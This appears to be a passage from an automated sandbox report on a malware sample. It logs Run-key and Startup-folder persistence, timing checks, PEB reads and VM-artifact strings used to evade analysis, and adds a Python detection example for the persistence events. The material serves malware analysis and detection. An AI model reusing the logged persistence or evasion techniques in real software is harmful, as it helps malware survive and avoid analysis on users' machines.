Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK
Source: C:\Windows\SysWOW64\cmmon32.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run T2KDJXN
Source: C:\Windows\SysWOW64\cmmon32.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run T2KDJXN
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
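The persistence recorded in this section combines two mechanisms from two processes: wscript.exe writes an HKCU Run value (204UO0JKWK) and drops JmtwmJXhXe.js into the Startup folder, and the cmmon32.exe host later writes a second Run value (T2KDJXN). That is what the 'Creates multiple autostart registry keys' and 'Drops script at startup location' signatures in the summary refer to. The following is an added example, not part of the report, of detection logic for those observations run over constructed Sysmon-style events (Event ID 11 file create, Event ID 13 registry value set). The event dictionaries, rule names and the random-looking-name heuristic are this example's own; the paths and value names are the ones the report lists, and the last two events are benign controls.

```python
import re
from collections import defaultdict

SCRIPT_HOSTS = {'wscript.exe', 'cscript.exe', 'mshta.exe', 'powershell.exe'}
SCRIPT_EXT = ('.js', '.jse', '.vbs', '.vbe', '.wsf', '.wsh', '.hta', '.ps1', '.bat', '.cmd')
STARTUP_DIR = '\\start menu\\programs\\startup\\'
RUN_KEY_RE = re.compile(r'\\software\\microsoft\\windows\\currentversion\\(run|runonce)\\([^\\]+)$', re.I)
# Heuristic (this example's own): 7 or more characters, upper-case letters and digits only,
# at least one of each. Matches 204UO0JKWK and T2KDJXN, not names such as OneDrive.
RANDOM_NAME_RE = re.compile(r'^(?=.*[A-Z])(?=.*\d)[A-Z0-9]{7,}$')

# Constructed Sysmon-style events. Paths and value names are those the report lists;
# the last two events are benign controls that must not alert.
EVENTS = [
    {'EventID': 13, 'Image': r'C:\Windows\System32\wscript.exe',
     'TargetObject': r'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\204UO0JKWK'},
    {'EventID': 11, 'Image': r'C:\Windows\System32\wscript.exe',
     'TargetFilename': r'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JmtwmJXhXe.js'},
    {'EventID': 13, 'Image': r'C:\Windows\SysWOW64\cmmon32.exe',
     'TargetObject': r'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\T2KDJXN'},
    {'EventID': 13, 'Image': r'C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDriveSetup.exe',
     'TargetObject': r'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive'},
    {'EventID': 11, 'Image': r'C:\Windows\explorer.exe',
     'TargetFilename': r'C:\Users\user\Documents\notes.txt'},
]


def basename(path):
    return path.rsplit('\\', 1)[-1].lower()


def evaluate(events):
    """Return (rule, image, detail) alerts for the events, plus one cross-event alert for every
    image that establishes more than one autostart mechanism."""
    alerts, mechanisms = [], defaultdict(set)
    for ev in events:
        img = basename(ev['Image'])
        if ev['EventID'] == 11:
            target = ev['TargetFilename']
            if STARTUP_DIR in target.lower() and target.lower().endswith(SCRIPT_EXT):
                alerts.append(('startup_folder_script_drop', img, target))
                mechanisms[img].add('startup_folder')
        elif ev['EventID'] == 13:
            m = RUN_KEY_RE.search(ev['TargetObject'])
            if not m:
                continue
            key, name = m.group(1).lower(), m.group(2)
            mechanisms[img].add('registry_' + key)
            if img in SCRIPT_HOSTS:
                alerts.append(('run_key_written_by_script_host', img, name))
            if RANDOM_NAME_RE.match(name):
                alerts.append(('run_key_random_value_name', img, name))
    for img, mechs in mechanisms.items():
        if len(mechs) >= 2:
            alerts.append(('multiple_autostart_mechanisms', img, ','.join(sorted(mechs))))
    return alerts


if __name__ == '__main__':
    for rule, image, detail in evaluate(EVENTS):
        print(f'{rule:32} {image:14} {detail}')
```

The name heuristic deliberately ignores mixed-case names; tune it against your own Run-key baseline before alerting on it alone, and treat the script-host and multiple-mechanism rules as the high-confidence signals.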

Malware Analysis System Evasion

Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Users\user\AppData\Local\Temp\bin.exe RDTSC instruction interceptor: First address: 00000000000B8C04 second address: 00000000000B8C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bin.exe RDTSC instruction interceptor: First address: 00000000000B8F9E second address: 00000000000B8FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 00000000032E8C04 second address: 00000000032E8C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 00000000032E8F9E second address: 00000000032E8FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Cex8di\5hol_r7nkdhp.exe RDTSC instruction interceptor: First address: 0000000000C58C04 second address: 0000000000C58C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Cex8di\5hol_r7nkdhp.exe RDTSC instruction interceptor: First address: 0000000000C58F9E second address: 0000000000C58FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\explorer.exe TID: 5872 Thread sleep time: -40000s >= -30000s
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 5612 Thread sleep count: 37 > 30
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 5612 Thread sleep time: -74000s >= -30000s
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000B8ED0 rdtsc 2_2_000B8ED0
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032F1660 FindFirstFileW,FindNextFileW,FindClose, 18_2_032F1660
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032F1659 FindFirstFileW,FindNextFileW,FindClose, 18_2_032F1659
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: explorer.exe, 00000004.00000000.328024223.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.328633752.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
Source: explorer.exe, 00000004.00000000.376103293.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000004.00000000.418272158.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.328633752.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000004.00000000.390516660.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.328633752.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
Source: explorer.exe, 00000004.00000000.420582143.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: wscript.exe, 00000001.00000002.823061632.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.714465991.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384876292.000001B7453F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.815158211.000001B7453E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384691056.000001B7453AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.714217538.000001B7453C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.384897364.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.714035079.000001B7453AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.801731870.000001B7453A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.574260264.000001A547F9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.573810530.000001A547FEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000000.316690565.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: <C:\Users\user\AppData\Roamingd_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.366337221.000000000820C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.328633752.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
Source: wscript.exe, 0000000F.00000003.615856775.0000023E30F26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.804286141.0000023E30F26000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW)
Source: explorer.exe, 00000004.00000000.328024223.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000004.00000000.328633752.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000B8ED0 rdtsc 2_2_000B8ED0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0181C182 mov eax, dword ptr fs:[00000030h] 2_2_0181C182
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182A185 mov eax, dword ptr fs:[00000030h] 2_2_0182A185
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FB171 mov eax, dword ptr fs:[00000030h] 2_2_017FB171
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FB171 mov eax, dword ptr fs:[00000030h] 2_2_017FB171
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01822990 mov eax, dword ptr fs:[00000030h] 2_2_01822990
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FC962 mov eax, dword ptr fs:[00000030h] 2_2_017FC962
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018769A6 mov eax, dword ptr fs:[00000030h] 2_2_018769A6
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018261A0 mov eax, dword ptr fs:[00000030h] 2_2_018261A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018261A0 mov eax, dword ptr fs:[00000030h] 2_2_018261A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018751BE mov eax, dword ptr fs:[00000030h] 2_2_018751BE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018751BE mov eax, dword ptr fs:[00000030h] 2_2_018751BE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018751BE mov eax, dword ptr fs:[00000030h] 2_2_018751BE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018751BE mov eax, dword ptr fs:[00000030h] 2_2_018751BE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018841E8 mov eax, dword ptr fs:[00000030h] 2_2_018841E8
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F9100 mov eax, dword ptr fs:[00000030h] 2_2_017F9100
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F9100 mov eax, dword ptr fs:[00000030h] 2_2_017F9100
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F9100 mov eax, dword ptr fs:[00000030h] 2_2_017F9100
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FB1E1 mov eax, dword ptr fs:[00000030h] 2_2_017FB1E1
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FB1E1 mov eax, dword ptr fs:[00000030h] 2_2_017FB1E1
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FB1E1 mov eax, dword ptr fs:[00000030h] 2_2_017FB1E1
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01814120 mov eax, dword ptr fs:[00000030h] 2_2_01814120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01814120 mov eax, dword ptr fs:[00000030h] 2_2_01814120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01814120 mov eax, dword ptr fs:[00000030h] 2_2_01814120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01814120 mov eax, dword ptr fs:[00000030h] 2_2_01814120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01814120 mov ecx, dword ptr fs:[00000030h] 2_2_01814120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182513A mov eax, dword ptr fs:[00000030h] 2_2_0182513A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182513A mov eax, dword ptr fs:[00000030h] 2_2_0182513A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0181B944 mov eax, dword ptr fs:[00000030h] 2_2_0181B944
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0181B944 mov eax, dword ptr fs:[00000030h] 2_2_0181B944
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01873884 mov eax, dword ptr fs:[00000030h] 2_2_01873884
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01873884 mov eax, dword ptr fs:[00000030h] 2_2_01873884
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018220A0 mov eax, dword ptr fs:[00000030h] 2_2_018220A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018220A0 mov eax, dword ptr fs:[00000030h] 2_2_018220A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018220A0 mov eax, dword ptr fs:[00000030h] 2_2_018220A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018220A0 mov eax, dword ptr fs:[00000030h] 2_2_018220A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018220A0 mov eax, dword ptr fs:[00000030h] 2_2_018220A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018220A0 mov eax, dword ptr fs:[00000030h] 2_2_018220A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018390AF mov eax, dword ptr fs:[00000030h] 2_2_018390AF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182F0BF mov ecx, dword ptr fs:[00000030h] 2_2_0182F0BF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182F0BF mov eax, dword ptr fs:[00000030h] 2_2_0182F0BF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182F0BF mov eax, dword ptr fs:[00000030h] 2_2_0182F0BF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0188B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0188B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0188B8D0 mov ecx, dword ptr fs:[00000030h] 2_2_0188B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0188B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0188B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0188B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0188B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0188B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0188B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0188B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0188B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01877016 mov eax, dword ptr fs:[00000030h] 2_2_01877016
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01877016 mov eax, dword ptr fs:[00000030h] 2_2_01877016
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01877016 mov eax, dword ptr fs:[00000030h] 2_2_01877016
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F58EC mov eax, dword ptr fs:[00000030h] 2_2_017F58EC
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C4015 mov eax, dword ptr fs:[00000030h] 2_2_018C4015
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C4015 mov eax, dword ptr fs:[00000030h] 2_2_018C4015
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0180B02A mov eax, dword ptr fs:[00000030h] 2_2_0180B02A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0180B02A mov eax, dword ptr fs:[00000030h] 2_2_0180B02A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0180B02A mov eax, dword ptr fs:[00000030h] 2_2_0180B02A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0180B02A mov eax, dword ptr fs:[00000030h] 2_2_0180B02A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182002D mov eax, dword ptr fs:[00000030h] 2_2_0182002D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182002D mov eax, dword ptr fs:[00000030h] 2_2_0182002D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182002D mov eax, dword ptr fs:[00000030h] 2_2_0182002D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182002D mov eax, dword ptr fs:[00000030h] 2_2_0182002D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182002D mov eax, dword ptr fs:[00000030h] 2_2_0182002D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01810050 mov eax, dword ptr fs:[00000030h] 2_2_01810050
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01810050 mov eax, dword ptr fs:[00000030h] 2_2_01810050
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018B2073 mov eax, dword ptr fs:[00000030h] 2_2_018B2073
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C1074 mov eax, dword ptr fs:[00000030h] 2_2_018C1074
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017F9080 mov eax, dword ptr fs:[00000030h] 2_2_017F9080
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018B138A mov eax, dword ptr fs:[00000030h] 2_2_018B138A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018AD380 mov ecx, dword ptr fs:[00000030h] 2_2_018AD380
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01801B8F mov eax, dword ptr fs:[00000030h] 2_2_01801B8F
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01801B8F mov eax, dword ptr fs:[00000030h] 2_2_01801B8F
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182B390 mov eax, dword ptr fs:[00000030h] 2_2_0182B390
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01822397 mov eax, dword ptr fs:[00000030h] 2_2_01822397
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FDB60 mov ecx, dword ptr fs:[00000030h] 2_2_017FDB60
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FF358 mov eax, dword ptr fs:[00000030h] 2_2_017FF358
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C5BA5 mov eax, dword ptr fs:[00000030h] 2_2_018C5BA5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01824BAD mov eax, dword ptr fs:[00000030h] 2_2_01824BAD
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01824BAD mov eax, dword ptr fs:[00000030h] 2_2_01824BAD
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01824BAD mov eax, dword ptr fs:[00000030h] 2_2_01824BAD
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FDB40 mov eax, dword ptr fs:[00000030h] 2_2_017FDB40
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018753CA mov eax, dword ptr fs:[00000030h] 2_2_018753CA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018753CA mov eax, dword ptr fs:[00000030h] 2_2_018753CA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018203E2 mov eax, dword ptr fs:[00000030h] 2_2_018203E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018203E2 mov eax, dword ptr fs:[00000030h] 2_2_018203E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018203E2 mov eax, dword ptr fs:[00000030h] 2_2_018203E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018203E2 mov eax, dword ptr fs:[00000030h] 2_2_018203E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018203E2 mov eax, dword ptr fs:[00000030h] 2_2_018203E2
